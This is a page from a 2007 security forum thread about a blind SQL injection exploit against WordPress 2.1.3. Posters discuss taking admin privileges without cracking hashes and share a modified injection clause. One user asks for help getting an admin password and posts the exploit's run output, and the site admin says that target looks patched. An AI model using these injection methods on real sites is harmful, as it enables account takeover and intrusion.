Waraxe IT Security Portal

:: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools ::

July 27, 2024

Menu

Home

Logout

Discussions

	Forums
	Members List
	IRC chat

Tools

	Base64 coder
	MD5 hash
	CRC32 checksum
	ROT13 coder
	SHA-1 hash
	URL-decoder
	Sql Char Encoder

Affiliates

	y3dips ITsec
	Md5 Cracker
	User Manuals
	AlbumNow

Content

	Content
	Sections
	FAQ
	Top

Info

	Feedback
	Recommend Us
	Search
	Journal
	Your Account

User Info

Membership:

Latest: MichaelSnaRe

New Today: 0

New Yesterday: 0

Overall: 9144

People Online:

Visitors: 231

Members: 0

Total: 231

Full disclosure

CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)

IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit	Goto page Previous 1, 2
	View previous topic :: View next topic

Posted: Tue May 22, 2007 12:11 pm

waraxe

Site admin

Joined: May 11, 2004

Posts: 2407

Location: Estonia, Tartu

spec wrote:

you're right waraxe, thanks Smile

I'm happy to help you Smile

Heh, what I read from wordpress delevopers:

Quote:

The actual cookies contain hashed data, so you don't have to worry about someone gleaning your username and password by reading the cookie data. A hash is the result of a specific mathematical formula applied to some input data (in this case your user name and password, respectively). It's quite hard to reverse a hash (bordering on practical infeasibility with today's computers). This means it is very difficult to take a hash and "unhash" it to find the original input data.

Funny thing - so much cryptography applied to make passwords "immune" to crack and still - even WITHOUT actual cracking we can get admin privileges Laughing

Posted: Tue May 22, 2007 12:21 pm

spec

Beginner

Joined: May 22, 2007

Posts: 4

who needs to unhash a hashed pass in this case? no one, you get to have an admin privileges and thats all it matters, Very Happy

, so much for security

Re: What about username they are not all "admin" :

Posted: Tue May 22, 2007 3:31 pm

_-GORO-_

Beginner

Joined: May 22, 2007

Posts: 3

That would be nice, buy I find out that every post on blog has an admin's (user name) as signature of the poster - it is open.
Very Happy

BTW - did you try it on any other versions?

waraxe wrote:

I got it

This needs some modifications to exploit. If you are interested, then I can make improved exploit with this additional functionality Smile

_-GORO-_ wrote:

waraxe wrote:

_-GORO-_ wrote:

Nice work!

What about username they are not all "admin" Smile

?

UNION ALL SELECT 1,2,user_name.... ?????

One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:

WHERE ID=%d AND IF

New:

Code:

WHERE display_name=%2527waraxe25%27 AND IF

Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Smile

Posted: Wed May 23, 2007 12:27 pm

waraxe

Site admin

Joined: May 11, 2004

Posts: 2407

Location: Estonia, Tartu

OK, it's done - I have posted new version of this exploit:

http://www.waraxe.us/ftopict-1780.html

It can now retrieve md5 hash AND user login Smile

Posted: Sun May 27, 2007 3:02 pm

pexli

Valuable expert

Joined: May 24, 2007

Posts: 665

Location: Bulgaria

GORO try this for old versions wordpress.

http://milw0rm.com/exploits/3109

i need help

Posted: Fri Jul 13, 2007 12:49 am

amir00

Beginner

Joined: Jul 13, 2007

Posts: 2

I need help to finde admin passwd.

Code:

sql table prefix: wp_ cookie suffix: c6e75ae1b68abe4cb4cb59d205593067 testing probe delays 8 9 9 9 8 8 mean nondelayed - 8 dsecs mean delayed - 8 dsecs normal delay: 8 deciseconds trying to get md5 hash from target finding hash now ... char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 1 --> 0 current value for user_pass: 0 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 2 --> 0 current value for user_pass: 00 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 3 --> 1 current value for user_pass: 001 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 4 --> 0 current value for user_pass: 0010 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 5 --> 0 current value for user_pass: 00100 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 6 --> 0 current value for user_pass: 001000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 7 --> 0 current value for user_pass: 0010000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 8 --> 0 current value for user_pass: 00100000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 9 --> 0 current value for user_pass: 001000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 10 --> 0 current value for user_pass: 0010000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 11 --> 0 current value for user_pass: 00100000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 12 --> 0 current value for user_pass: 001000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 13 --> 0 current value for user_pass: 0010000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 14 --> 0 current value for user_pass: 00100000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 15 --> 0 current value for user_pass: 001000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 16 --> 0 current value for user_pass: 0010000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 17 --> 0 current value for user_pass: 00100000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 18 --> 0 current value for user_pass: 001000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 19 --> 0 current value for user_pass: 0010000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 20 --> 0 current value for user_pass: 00100000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 21 --> 0 current value for user_pass: 001000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 22 --> 0 current value for user_pass: 0010000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 23 --> 0 current value for user_pass: 00100000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 24 --> 0 current value for user_pass: 001000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 25 --> 0 current value for user_pass: 0010000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 26 --> 0 current value for user_pass: 00100000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 27 --> 0 current value for user_pass: 001000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 28 --> 0 current value for user_pass: 0010000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 29 --> 0 current value for user_pass: 00100000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 30 --> 0 current value for user_pass: 001000000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 31 --> 0 current value for user_pass: 0010000000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 32 --> 0 current value for user_pass: 00100000000000000000000000000000 Final result: user_pass=00100000000000000000000000000000 trying to get user login from target first we need user login length ... starting user_login length retrieve curr: 30--30--0 curr: 15--15--0 curr: 7--7--0 curr: 3--3--0 curr: 1--1--0 user login length is 0 chars finding user login now ... Final result: user_login= Work finished Questions and feedback - http://www.waraxe.us/ See ya! :)

Posted: Fri Jul 13, 2007 2:22 am

Sm0ke

Moderator

Joined: Nov 25, 2006

Posts: 141

Location: Finland

user_pass=00100000000000000000000000000000

Posted: Fri Jul 13, 2007 9:30 am

waraxe

Site admin

Joined: May 11, 2004

Posts: 2407

Location: Estonia, Tartu

It seems to be patched WP installation, so that this exploit is not working (anymore) ...

Posted: Fri Jul 13, 2007 4:05 pm

amir00

Beginner

Joined: Jul 13, 2007

Posts: 2

waraxe wrote:

It seems to be patched WP installation, so that this exploit is not working (anymore) ...

ok . thank

WordPress 2.1.3 sql injection blind fishing exploit

www.waraxe.us Forum Index -> All other software

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

All times are GMT
Page 2 of 2 Goto page Previous 1, 2

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.212 Seconds